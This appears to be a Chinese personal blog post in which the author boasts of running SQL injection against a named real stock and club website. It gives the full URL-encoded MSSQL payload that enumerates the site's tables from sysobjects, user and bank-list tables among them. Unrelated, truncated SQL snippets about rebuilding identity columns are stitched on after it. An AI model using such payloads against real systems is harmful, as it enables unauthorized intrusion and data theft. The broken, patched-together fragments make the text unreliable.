wolfeng's blog

今天我自虐的对一处sql注入点进行注入,把最后的一个注入贴出来,比较变态:
http://club.cinews.net/stock/stockdetail.asp?stockname=跑马地''and%20(Select%20Top%201%20name%20from%20sysobjects%20where%20xtype=char(85)%20and%20status>0%20%20and%20name<>%27%65%63%61%72%64%6D%65%73%73%61%67%65%27%20and%20name<>%27%61%71%5F%73%63%6F%72%65%27%20and%20name<>%27%42%61%64%4C%69%73%74%27%20and%20name<>%27%42%61%6E%6B%55%73%65%72%4C%69%73%74%27%20and%20name<>%27banzhu%27%20and%20name<>%27card%27%20and%20name<>%27cdd_score%27%20and%20name<>%27chess_score%27%20and%20name<>%27cyfd%27%20and%20name<>%27dahu%27%20and%20name<>%27ddz_score%27%20and%20name<>%27ecard%27%20and%20name<>%27ecardlead%27%20and%20name<>%27face%27%20and%20name<>%27facelist%27%20and%20name<>%27friend%27%20and%20name<>%27friendlist%27%20and%20name<>%27geter%27%20and%20name<>%27gift%27%20and%20name<>%27goodslist%27%20and%20name<>%27guesslist%27%20and%20name<>%27gupiaoconfig%27%20and%20name<>%27gz_score%27%20and%20name<>%27job%27%20and%20name<>%27jq_score%27%20and%20name<>%27kehu%27%20and%20name<>%27message%27%20and%20name<>%27mj_score%27%20and%20name<>%27movice%27%20and%20name<>%27news%27%20and%20name<>%27pdk_score%27%20and%20name<>%27propertys%27%20and%20name<>%27sgjq_score%27%20and%20name<>%27stock%27%20and%20name<>%27stockbuylist%27%20and%20name<>%27stocklist%27%20and%20name<>%27stocknews%27%20and%20name<>%27sysmsg%27%20and%20name<>%27tlj_score%27%20and%20name<>%27user8%27%20and%20name<>%27userinfo%27%20and%20name<>%27users%27%20and%20name<>%27wq_score%27%20and%20name<>%27wzq_score%27%20and%20name<>%27xq_score%27%20and%20name<>%27yuelao%27)>0%20;--

说明一下:上面注入是探测sql内的所有数据表,型如and name <>%27card%27 之类的东西,是我一步一步的加的,加一个出一个表,呵呵,比较笨,笨死了,但是我喜欢.

功能：把test表中缺失的identity属性加上。
思路：把test表数据写如临时表，然后删除test表，重建test表，设置test的identity_insert为on，然后把临时表的数据导入test，直接在查询分析器了执行即可，呵呵。
select distinct * into #Tmp from test
drop table test
CREATE TABLE test (

A. 如有必要，重置当前标识值
下例在必要的情况下重置 jobs 表的当前标识值。

USE pubs
GO